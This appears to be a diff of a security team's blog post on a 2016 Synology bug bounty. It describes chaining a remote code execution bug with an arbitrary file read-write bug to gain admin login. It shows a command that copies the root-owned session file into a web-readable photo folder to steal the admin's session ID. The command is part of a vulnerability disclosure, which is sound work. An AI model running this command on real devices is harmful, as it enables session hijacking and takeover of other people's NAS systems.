bamboofox/old-blog/source/_posts/Synology-Bug-Bounty-2016.md

 ![Remote Code Execution](http://i.imgur.com/5YrQU54.jpg)

-Also by exploiting Vul-02 ( RCE ) and Vul-03 ( Read-Write Arbitrary Files ), we're able to login the service as as admin.
+Also by exploiting Vul-02 and Vul-03, we're able to login the service as admin.
 If the admin is logged in, we can use the following command to get the admin's session ID:

 ```
 usr/syno/bin/synophoto_dsm_user --copy root /usr/syno/etc/private/session/current.users /volume1/photo/current.users